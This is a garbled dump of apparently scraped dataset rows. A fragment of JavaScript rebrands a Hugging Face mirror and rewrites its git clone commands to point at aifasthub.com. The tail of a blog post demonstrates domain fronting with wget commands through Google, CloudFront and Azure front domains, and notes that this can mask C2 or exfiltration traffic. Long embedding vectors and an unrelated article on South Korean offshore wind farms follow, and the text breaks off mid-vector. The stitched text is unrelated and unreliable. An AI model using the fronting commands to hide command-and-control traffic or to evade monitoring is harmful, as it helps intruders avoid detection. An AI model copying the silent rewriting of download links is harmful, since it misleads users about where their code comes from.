{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \n\nWith it we can visit the SecurityArtWork Twitter account :-) without even touching directly Twitter servers (obviously, the reflector gets all your requests, so be careful):\n\n$ wget -O- --header='Host: 3benben.appspot.com' \\ https://www.google.es/securityartwork | fgrep description | head -1 [...] [...]\n\nThis will work from countries or networks in which Twitter is blocked, as long as Google HTTPS frontal servers are not blocked ;-)\n\nThere are a lot of CDN networks that can be (ab)used in this way; for example, Meek supports the usage of a reflector hosted in Amazon CloudFront. This reflector proxies to a Tor network bridge:\n\n$ wget -qO- https://a0.awsstatic.com/ --header 'Host: d2zfqthxsdq309.cloudfront.net' I’m just a happy little web server.\n\nIn this way, it’s possible to use the Tor network, and from the outside network monitoring will only get to see HTTPS accesses to the front domain a0.awsstatic.com, used for a bunch of stuff. The same happens with the Microsoft Azure CDN network:\n\n$ wget -qO- https://ajax.aspnetcdn.com/ --header 'Host: az786092.vo.msecnd.net' I’m just a happy little web server.\n\nIn the same way that we could host our C2/exfiltration server on Google App Engine, the above examples show how to make the same thing with a VPS hosted on CloudFront or Azure. This technique can be used to mask any type of network traffic; from outside it will seem like usual access to the corresponding frontal server.\n\nSo be careful with contacts with CDN networks and frontal server: they are not always what they seem! :-) From the ignorance of the one who writes (any info is welcome! Feel free to comment!), there are no published reports of APT groups that use this technique directly, but it would not be really surprising that it’s in active usage as a common practice to circumvent egress controls and monitoring (there is information about some cases in which services like Google Docs, Google Drive, Google Apps Script, and so on have been used for C&C or exfiltration, but as far as we know by now, they didn’t use domain fronting: they didn’t hide the access to domains like docs.google.com, which would be a step beyond).\n\nOf course, this is a technique relatively easy to detect by using traffic analysis (because although the domain that we see is only the frontal server domain, in reality the traffic corresponds to that of the embedded service, and that’s going to produce a more or less distinguishable fingerprint, size and timing of network packets, and so on), or anomaly detection (for an easy one, if the HTTPS/TLS client fingerprint it’s not hidden properly, we’ll detect the malware), but that’s another story… ;-)\n\nBest regards!\n\n@pmarinram\n\nReally cool stuff"},"embedding":{"kind":"list like","value":[-0.09454420953989029,0.015779098495841026,0.04745059832930565,-0.08051864802837372,-0.03489263728260994,-0.1283068060874939,-0.01961386762559414,-0.07720034569501877,0.03957580029964447,-0.05716212838888168,-0.05170062556862831,0.03437488153576851,0.09431569278240204,-0.07926223427057266,0.014405801892280579,-0.06103243678808212,-0.040312401950359344,0.03872024267911911,0.055693190544843674,-0.06458628177642822,-0.043547894805669785,-0.014962693676352501,-0.027029624208807945,-0.004153240937739611,-0.07081139832735062,-0.05083752050995827,-0.0034886905923485756,0.022307083010673523,-0.02431563287973404,-0.06607002019882202,0.01876862160861492,0.06333933025598526,0.020428020507097244,0.05106460675597191,-0.06640516966581345,0.022802205756306648,0.0335809588432312,0.056172601878643036,-0.021712947636842728,0.004025076981633902,0.07399147748947144,-0.13494084775447845,0.08641250431537628,0.03322243690490723,-0.05576096847653389,0.05172719433903694,0.01511154044419527,-0.03259521350264549,-0.02048908919095993,-0.09991591423749924,0.03035116381943226,-0.037135444581508636,-0.03429005667567253,0.06026554852724075,-0.11203768104314804,0.014611799269914627,-0.026910018175840378,0.035813041031360626,0.01796320453286171,0.11210796982049942,0.03254247456789017,0.03530465438961983,-0.02018120139837265,-0.004955084063112736,0.031114308163523674,-0.01443524844944477,-0.022788329049944878,-0.038374364376068115,0.01394827663898468,0.017132539302110672,0.04592619836330414,-0.02344968169927597,-0.05619552358984947,0.0020529439207166433,0.005025813356041908,0.018411139026284218,-0.09176995605230331,-0.0217518862336874,-0.0017676226561889052,-0.06327350437641144,0.05139435455203056,-0.009034181013703346,-0.01526636816561222,0.07521583884954453,0.002261072862893343,0.029956994578242302,-0.025193149223923683,-0.0767659991979599,0.10814397037029266,0.01348540373146534,0.01164273638278246,-0.08732569217681885,0.019570764154195786,0.050548870116472244,0.02895619161427021,0.051879581063985825,0.0026347043458372355,-0.047240402549505234,-0.03665223345160484,0.010373396798968315,0.022575920447707176,0.030759133398532867,0.012061543762683868,-0.08556832373142242,0.016725236549973488,0.051649920642375946,0.03148370981216431,0.0788097232580185,0.08587835729122162,-0.036292050033807755,0.007291773334145546,0.011632557958364487,0.039370305836200714,-0.10595279186964035,-0.04210943356156349,0.00710528576746583,0.036323800683021545,0.022010020911693573,0.08481240272521973,-0.08369096368551254,-0.0009883804013952613,0.01416724268347025,-0.010175823234021664,-0.003842993639409542,0.08046869933605194,-0.049869194626808167,0.02308478392660618,1.2208390454052572e-32,0.10552408546209335,0.17540781199932098,0.008126615546643734,-0.021844597533345222,-0.04691372811794281,0.0177859328687191,0.020974349230527878,0.042120300233364105,-0.04304860159754753,0.1367625892162323,0.027875550091266632,0.06911025196313858,0.020138727501034737,-0.019727982580661774,0.04899340495467186,0.03772174194455147,-0.03050168789923191,-0.011425451375544071,-0.02416040375828743,0.009416328743100166,0.029427476227283478,-0.00029809106490574777,0.028068333864212036,-0.0241609625518322,0.015963153913617134,0.017808783799409866,-0.08159100264310837,0.008639301173388958,0.051468078047037125,0.015489486977458,0.00017185248725581914,0.0188523568212986,-0.002887839451432228,0.04761475324630737,0.09441956132650375,0.012541217729449272,0.10259390622377396,-0.021096238866448402,0.010728458873927593,0.026766760274767876,0.008373940363526344,0.036539167165756226,0.0038425649981945753,0.04432031512260437,0.01221973542124033,-0.015094944275915623,-0.0934465229511261,-0.04292003810405731,0.05433987081050873,0.03810970112681389,-0.00408332422375679,-0.026213310658931732,-0.04122886806726456,-0.024530693888664246,-0.03436930850148201,-0.014308668673038483,-0.005762476474046707,0.03873696178197861,-0.026341799646615982,0.07970789819955826,0.016222773119807243,-0.014533772133290768,-0.11159098148345947,0.011675343848764896,-0.008022919297218323,-0.043968893587589264,0.02168360911309719,-0.011152382008731365,-0.0931585431098938,0.04608754813671112,-0.03259255364537239,0.08427590876817703,-0.024772215634584427,-0.01857379451394081,-0.04827587306499481,-0.012754473835229874,0.004187841434031725,0.13201318681240082,0.09379889070987701,-0.07992950826883316,0.06826476752758026,-0.007071046158671379,0.029446162283420563,0.06788546591997147,-0.035552266985177994,0.06891143321990967,0.05611604079604149,-0.06198335811495781,-0.10611237585544586,0.008013008162379265,-0.08572990447282791,-0.013907043263316154,0.05286882072687149,0.03432043641805649,-0.08130700886249542,-1.1386775738809458e-32,-0.08961788564920425,-0.022840434685349464,0.005913449451327324,0.0560438372194767,-0.010191037319600582,-0.12446439266204834,0.045198824256658554,0.04396842047572136,0.0016787837957963347,0.06244999170303345,0.031120408326387405,-0.042490046471357346,0.07648953050374985,0.014036882668733597,0.06953375786542892,-0.09083069115877151,-0.01760184019804001,-0.002158781513571739,-0.15067121386528015,-0.02257334627211094,-0.01546410471200943,0.014785406179726124,-0.045681245625019073,0.025065850466489792,0.016850775107741356,0.028404654935002327,-0.022772720083594322,0.020247168838977814,-0.034236740320920944,0.024205151945352554,-0.06175684556365013,0.03536388278007507,0.050598300993442535,0.03453603759407997,-0.09368342906236649,0.01603628136217594,-0.0036427851300686598,0.09374840557575226,0.046145226806402206,-0.08797707408666611,0.014429471455514431,-0.010503550991415977,-0.00020992335339542478,-0.03858271613717079,-0.029490208253264427,0.0031249781604856253,-0.09212927520275116,0.11507455259561539,-0.050940822809934616,0.04911345615983009,0.03177278861403465,0.013377031311392784,0.009411786682903767,-0.01812077686190605,0.0024454116355627775,0.016905123367905617,0.025493228808045387,0.00912113394588232,0.01478760875761509,-0.04085678234696388,0.04155272990465164,0.02397933602333069,-0.051846813410520554,0.027988865971565247,0.06581462174654007,0.058588024228811264,-0.1145489513874054,0.006765438709408045,0.013773936778306961,-0.004919236060231924,0.036651212722063065,-0.09340005367994308,-0.059742532670497894,-0.11017663776874542,0.05278058350086212,0.024272050708532333,0.05090848729014397,-0.008107280358672142,-0.02327866293489933,0.08089955151081085,0.06878654658794403,-0.06352856755256653,-0.0029918525833636522,-0.03635171428322792,0.06302349269390106,0.04864736646413803,0.008762874640524387,0.0022822970058768988,-0.025951417163014412,0.018946290016174316,-0.05780602991580963,0.07493984699249268,-0.03883518651127815,0.05018205940723419,0.08581717312335968,-7.127685108798687e-8,-0.006922646891325712,-0.007222087122499943,-0.09375088661909103,0.050189655274152756,0.0038760434836149216,0.044560015201568604,0.015222745016217232,-0.07625380903482437,-0.024039704352617264,-0.04520929604768753,-0.002237519947811961,-0.03575298935174942,-0.029929736629128456,-0.018718507140874863,-0.01846611686050892,-0.007135401014238596,-0.07177691161632538,-0.036443427205085754,-0.07199855148792267,-0.01999681070446968,-0.06436045467853546,0.0169311985373497,0.017632726579904556,-0.037688951939344406,-0.06376735866069794,-0.012550742365419865,0.014474690891802311,0.010716934688389301,-0.004243824165314436,0.030117681249976158,-0.05114341154694557,-0.058538004755973816,0.00016284614684991539,0.05111154541373253,-0.02210024558007717,0.10121496766805649,-0.09776526689529419,-0.05840913951396942,0.023927222937345505,0.08996769785881042,-0.022953322157263756,0.031522154808044434,0.002542987698689103,0.024632209911942482,-0.01941242814064026,0.015400058589875698,0.0578790158033371,0.009003253653645515,0.09585856646299362,0.003998661879450083,-0.03308011218905449,-0.048612773418426514,-0.042414139956235886,-0.0364418588578701,-0.02650296501815319,-0.010314497165381908,0.022465243935585022,-0.02883525751531124,-0.09070985019207001,0.05328547954559326,0.0072203935123980045,-0.03507561981678009,0.027801217511296272,0.05732458457350731],"string":"[\n -0.09454420953989029,\n 0.015779098495841026,\n 0.04745059832930565,\n -0.08051864802837372,\n -0.03489263728260994,\n -0.1283068060874939,\n -0.01961386762559414,\n -0.07720034569501877,\n 0.03957580029964447,\n -0.05716212838888168,\n -0.05170062556862831,\n 0.03437488153576851,\n 0.09431569278240204,\n -0.07926223427057266,\n 0.014405801892280579,\n -0.06103243678808212,\n -0.040312401950359344,\n 0.03872024267911911,\n 0.055693190544843674,\n -0.06458628177642822,\n -0.043547894805669785,\n -0.014962693676352501,\n -0.027029624208807945,\n -0.004153240937739611,\n -0.07081139832735062,\n -0.05083752050995827,\n -0.0034886905923485756,\n 0.022307083010673523,\n -0.02431563287973404,\n -0.06607002019882202,\n 0.01876862160861492,\n 0.06333933025598526,\n 0.020428020507097244,\n 0.05106460675597191,\n -0.06640516966581345,\n 0.022802205756306648,\n 0.0335809588432312,\n 0.056172601878643036,\n -0.021712947636842728,\n 0.004025076981633902,\n 0.07399147748947144,\n -0.13494084775447845,\n 0.08641250431537628,\n 0.03322243690490723,\n -0.05576096847653389,\n 0.05172719433903694,\n 0.01511154044419527,\n -0.03259521350264549,\n -0.02048908919095993,\n -0.09991591423749924,\n 0.03035116381943226,\n -0.037135444581508636,\n -0.03429005667567253,\n 0.06026554852724075,\n -0.11203768104314804,\n 0.014611799269914627,\n -0.026910018175840378,\n 0.035813041031360626,\n 0.01796320453286171,\n 0.11210796982049942,\n 0.03254247456789017,\n 0.03530465438961983,\n -0.02018120139837265,\n -0.004955084063112736,\n 0.031114308163523674,\n -0.01443524844944477,\n -0.022788329049944878,\n -0.038374364376068115,\n 0.01394827663898468,\n 0.017132539302110672,\n 0.04592619836330414,\n -0.02344968169927597,\n -0.05619552358984947,\n 0.0020529439207166433,\n 0.005025813356041908,\n 0.018411139026284218,\n -0.09176995605230331,\n -0.0217518862336874,\n -0.0017676226561889052,\n -0.06327350437641144,\n 0.05139435455203056,\n -0.009034181013703346,\n -0.01526636816561222,\n 0.07521583884954453,\n 0.002261072862893343,\n 0.029956994578242302,\n -0.025193149223923683,\n -0.0767659991979599,\n 0.10814397037029266,\n 0.01348540373146534,\n 0.01164273638278246,\n -0.08732569217681885,\n 0.019570764154195786,\n 0.050548870116472244,\n 0.02895619161427021,\n 0.051879581063985825,\n 0.0026347043458372355,\n -0.047240402549505234,\n -0.03665223345160484,\n 0.010373396798968315,\n 0.022575920447707176,\n 0.030759133398532867,\n 0.012061543762683868,\n -0.08556832373142242,\n 0.016725236549973488,\n 0.051649920642375946,\n 0.03148370981216431,\n 0.0788097232580185,\n 0.08587835729122162,\n -0.036292050033807755,\n 0.007291773334145546,\n 0.011632557958364487,\n 0.039370305836200714,\n -0.10595279186964035,\n -0.04210943356156349,\n 0.00710528576746583,\n 0.036323800683021545,\n 0.022010020911693573,\n 0.08481240272521973,\n -0.08369096368551254,\n -0.0009883804013952613,\n 0.01416724268347025,\n -0.010175823234021664,\n -0.003842993639409542,\n 0.08046869933605194,\n -0.049869194626808167,\n 0.02308478392660618,\n 1.2208390454052572e-32,\n 0.10552408546209335,\n 0.17540781199932098,\n 0.008126615546643734,\n -0.021844597533345222,\n -0.04691372811794281,\n 0.0177859328687191,\n 0.020974349230527878,\n 0.042120300233364105,\n -0.04304860159754753,\n 0.1367625892162323,\n 0.027875550091266632,\n 0.06911025196313858,\n 0.020138727501034737,\n -0.019727982580661774,\n 0.04899340495467186,\n 0.03772174194455147,\n -0.03050168789923191,\n -0.011425451375544071,\n -0.02416040375828743,\n 0.009416328743100166,\n 0.029427476227283478,\n -0.00029809106490574777,\n 0.028068333864212036,\n -0.0241609625518322,\n 0.015963153913617134,\n 0.017808783799409866,\n -0.08159100264310837,\n 0.008639301173388958,\n 0.051468078047037125,\n 0.015489486977458,\n 0.00017185248725581914,\n 0.0188523568212986,\n -0.002887839451432228,\n 0.04761475324630737,\n 0.09441956132650375,\n 0.012541217729449272,\n 0.10259390622377396,\n -0.021096238866448402,\n 0.010728458873927593,\n 0.026766760274767876,\n 0.008373940363526344,\n 0.036539167165756226,\n 0.0038425649981945753,\n 0.04432031512260437,\n 0.01221973542124033,\n -0.015094944275915623,\n -0.0934465229511261,\n -0.04292003810405731,\n 0.05433987081050873,\n 0.03810970112681389,\n -0.00408332422375679,\n -0.026213310658931732,\n -0.04122886806726456,\n -0.024530693888664246,\n -0.03436930850148201,\n -0.014308668673038483,\n -0.005762476474046707,\n 0.03873696178197861,\n -0.026341799646615982,\n 0.07970789819955826,\n 0.016222773119807243,\n -0.014533772133290768,\n -0.11159098148345947,\n 0.011675343848764896,\n -0.008022919297218323,\n -0.043968893587589264,\n 0.02168360911309719,\n -0.011152382008731365,\n -0.0931585431098938,\n 0.04608754813671112,\n -0.03259255364537239,\n 0.08427590876817703,\n -0.024772215634584427,\n -0.01857379451394081,\n -0.04827587306499481,\n -0.012754473835229874,\n 0.004187841434031725,\n 0.13201318681240082,\n 0.09379889070987701,\n -0.07992950826883316,\n 0.06826476752758026,\n -0.007071046158671379,\n 0.029446162283420563,\n 0.06788546591997147,\n -0.035552266985177994,\n 0.06891143321990967,\n 0.05611604079604149,\n -0.06198335811495781,\n -0.10611237585544586,\n 0.008013008162379265,\n -0.08572990447282791,\n -0.013907043263316154,\n 0.05286882072687149,\n 0.03432043641805649,\n -0.08130700886249542,\n -1.1386775738809458e-32,\n -0.08961788564920425,\n -0.022840434685349464,\n 0.005913449451327324,\n 0.0560438372194767,\n -0.010191037319600582,\n -0.12446439266204834,\n 0.045198824256658554,\n 0.04396842047572136,\n 0.0016787837957963347,\n 0.06244999170303345,\n 0.031120408326387405,\n -0.042490046471357346,\n 0.07648953050374985,\n 0.014036882668733597,\n 0.06953375786542892,\n -0.09083069115877151,\n -0.01760184019804001,\n -0.002158781513571739,\n -0.15067121386528015,\n -0.02257334627211094,\n -0.01546410471200943,\n 0.014785406179726124,\n -0.045681245625019073,\n 0.025065850466489792,\n 0.016850775107741356,\n 0.028404654935002327,\n -0.022772720083594322,\n 0.020247168838977814,\n -0.034236740320920944,\n 0.024205151945352554,\n -0.06175684556365013,\n 0.03536388278007507,\n 0.050598300993442535,\n 0.03453603759407997,\n -0.09368342906236649,\n 0.01603628136217594,\n -0.0036427851300686598,\n 0.09374840557575226,\n 0.046145226806402206,\n -0.08797707408666611,\n 0.014429471455514431,\n -0.010503550991415977,\n -0.00020992335339542478,\n -0.03858271613717079,\n -0.029490208253264427,\n 0.0031249781604856253,\n -0.09212927520275116,\n 0.11507455259561539,\n -0.050940822809934616,\n 0.04911345615983009,\n 0.03177278861403465,\n 0.013377031311392784,\n 0.009411786682903767,\n -0.01812077686190605,\n 0.0024454116355627775,\n 0.016905123367905617,\n 0.025493228808045387,\n 0.00912113394588232,\n 0.01478760875761509,\n -0.04085678234696388,\n 0.04155272990465164,\n 0.02397933602333069,\n -0.051846813410520554,\n 0.027988865971565247,\n 0.06581462174654007,\n 0.058588024228811264,\n -0.1145489513874054,\n 0.006765438709408045,\n 0.013773936778306961,\n -0.004919236060231924,\n 0.036651212722063065,\n -0.09340005367994308,\n -0.059742532670497894,\n -0.11017663776874542,\n 0.05278058350086212,\n 0.024272050708532333,\n 0.05090848729014397,\n -0.008107280358672142,\n -0.02327866293489933,\n 0.08089955151081085,\n 0.06878654658794403,\n -0.06352856755256653,\n -0.0029918525833636522,\n -0.03635171428322792,\n 0.06302349269390106,\n 0.04864736646413803,\n 0.008762874640524387,\n 0.0022822970058768988,\n -0.025951417163014412,\n 0.018946290016174316,\n -0.05780602991580963,\n 0.07493984699249268,\n -0.03883518651127815,\n 0.05018205940723419,\n 0.08581717312335968,\n -7.127685108798687e-8,\n -0.006922646891325712,\n -0.007222087122499943,\n -0.09375088661909103,\n 0.050189655274152756,\n 0.0038760434836149216,\n 0.044560015201568604,\n 0.015222745016217232,\n -0.07625380903482437,\n -0.024039704352617264,\n -0.04520929604768753,\n -0.002237519947811961,\n -0.03575298935174942,\n -0.029929736629128456,\n -0.018718507140874863,\n -0.01846611686050892,\n -0.007135401014238596,\n -0.07177691161632538,\n -0.036443427205085754,\n -0.07199855148792267,\n -0.01999681070446968,\n -0.06436045467853546,\n 0.0169311985373497,\n 0.017632726579904556,\n -0.037688951939344406,\n -0.06376735866069794,\n -0.012550742365419865,\n 0.014474690891802311,\n 0.010716934688389301,\n -0.004243824165314436,\n 0.030117681249976158,\n -0.05114341154694557,\n -0.058538004755973816,\n 0.00016284614684991539,\n 0.05111154541373253,\n -0.02210024558007717,\n 0.10121496766805649,\n -0.09776526689529419,\n -0.05840913951396942,\n 0.023927222937345505,\n 0.08996769785881042,\n -0.022953322157263756,\n 0.031522154808044434,\n 0.002542987698689103,\n 0.024632209911942482,\n -0.01941242814064026,\n 0.015400058589875698,\n 0.0578790158033371,\n 0.009003253653645515,\n 0.09585856646299362,\n 0.003998661879450083,\n -0.03308011218905449,\n -0.048612773418426514,\n -0.042414139956235886,\n -0.0364418588578701,\n -0.02650296501815319,\n -0.010314497165381908,\n 0.022465243935585022,\n -0.02883525751531124,\n -0.09070985019207001,\n 0.05328547954559326,\n 0.0072203935123980045,\n -0.03507561981678009,\n 0.027801217511296272,\n 0.05732458457350731\n]"}}},{"rowIdx":1282,"cells":{"text":{"kind":"string","value":"If there's one thing that South-Korea has a lot of, it's coastlines. Offshore wind power is a great fit for the country, which is probably why the government and private companies have decided to invest 9.2 trillion won ($8.2 billion) in offshore wind farms. A 100 MW pilot wind farm is scheduled to come online by 2013, to be followed by a 900 MW one by 2016, and then an additional 1,500 MW of further capacity by 2019, for a total of 2,500 MW and 500 turbines (huge 5 MW ones!).\n\nThe new wind farms will be located on the country's West coast.\n\n\"The nation joins China, Denmark, the U.S. and other countries in developing offshore wind farms. Global offshore wind power capacity totals 2.9 gigawatts, with 2.6 gigawatts under construction and about 154 gigawatts planned or proposed, according to the ministry.\" (source)\n\nVia Bloomberg, Techcrunch\n\nMore on Alternative Energy\n\nStirling Engine Made with Soda Cans Spins to 860 RPM (Video)\n\nAlgenol's Algae-to-Ethanol Delivers 67% to 87% Reduction in CO2\n\nDr. Steven Chu Answers Questions from Citizens About Energy Conservation (Video)\n\nShould Energy Conservation be Framed in Terms of What Would be Lost?\n\n2009 Snapshot of U.S. Energy Use by Lawrence Livermore National Laboratory"},"embedding":{"kind":"list like","value":[0.013282880187034607,0.0353010930120945,0.02255553938448429,0.013468416407704353,0.07223203033208847,-0.058683015406131744,-0.08272326737642288,0.01854543201625347,-0.047682810574769974,-0.029436931014060974,-0.007258013356477022,-0.0147628765553236,-0.01466116402298212,-0.057560138404369354,0.025263391435146332,0.09703534096479416,-0.01958186738193035,-0.09541033953428268,-0.05561375990509987,-0.01963898167014122,0.06366925686597824,0.0018062497256323695,0.029966074973344803,-0.09363426268100739,0.07949350774288177,0.007345120422542095,-0.07355065643787384,0.00940885953605175,-0.010966552421450615,0.06581655889749527,-0.03997395560145378,0.07493093609809875,-0.03522830456495285,0.029163731262087822,0.06178560107946396,0.07050839811563492,-0.024186167865991592,0.04989216476678848,0.004927071277052164,0.036151811480522156,0.011106283403933048,-0.01954757422208786,0.08338326215744019,-0.04797200486063957,0.00003771459523704834,0.018495429307222366,0.03371618688106537,-0.009999671950936317,-0.015371228568255901,-0.01401203591376543,0.01885400153696537,-0.050029657781124115,-0.017166556790471077,-0.025743423029780388,-0.02269781567156315,-0.031299591064453125,0.004170653410255909,0.012046921998262405,-0.005278054159134626,0.06942897289991379,0.04203254356980324,-0.08789467811584473,-0.04714817926287651,-0.037358563393354416,0.0411393828690052,0.027727801352739334,0.015962060540914536,0.019901549443602562,-0.05693734809756279,-0.04398096352815628,0.03645159304141998,-0.09691355377435684,-0.0066884891130030155,0.03948159143328667,-0.07986830174922943,0.006309400778263807,0.10973535478115082,0.010949209332466125,0.10436739027500153,-0.05640088766813278,0.042831458151340485,0.019766444340348244,-0.015566335991024971,-0.09542308747768402,-0.010946383699774742,-0.014014636166393757,-0.026077812537550926,0.04861387610435486,0.020784547552466393,0.048780180513858795,-0.042797960340976715,-0.040075767785310745,0.02286459133028984,0.052173834294080734,0.04295273870229721,0.1404026746749878,-0.04259485751390457,0.017357584089040756,-0.06952790170907974,-0.034520070999860764,0.06352149695158005,0.11126499623060226,0.078969307243824,-0.12208937853574753,-0.0614737868309021,0.02769273705780506,-0.020793752744793892,0.044303055852651596,0.06300380080938339,-0.03700026497244835,-0.05333856865763664,0.0760241374373436,-0.04493407905101776,-0.009622765704989433,0.017050115391612053,-0.055967431515455246,0.06785349547863007,-0.08519063889980316,-0.008769693784415722,0.07640386372804642,0.052778344601392746,-0.04978279769420624,-0.01072676945477724,-0.05617113411426544,0.05571403354406357,0.00029001376242376864,-0.05461272597312927,1.0203187191026797e-33,-0.015376508235931396,0.052736230194568634,0.04388860985636711,-0.004440782591700554,-0.018093768507242203,0.06762751191854477,0.014097196981310844,-0.04588226601481438,-0.027243953198194504,0.049037229269742966,-0.07245887070894241,0.0422484427690506,-0.03266521170735359,0.062931127846241,0.048675935715436935,-0.1511206030845642,0.056771181523799896,-0.09913374483585358,0.009216118603944778,0.03852466493844986,0.038684744387865067,-0.030476750805974007,-0.01589411497116089,0.003360527800396085,0.034455556422472,-0.08973608911037445,0.10990527272224426,-0.06060661002993584,0.02919420227408409,0.05457653850317001,-0.006740021985024214,-0.018561994656920433,-0.022939620539546013,-0.06228796765208244,-0.05849974602460861,-0.02595117688179016,-0.020826978608965874,-0.011405226774513721,-0.016726624220609665,0.029919292777776718,-0.01588403806090355,0.04843609035015106,-0.10777856409549713,0.06020159646868706,-0.0175141151994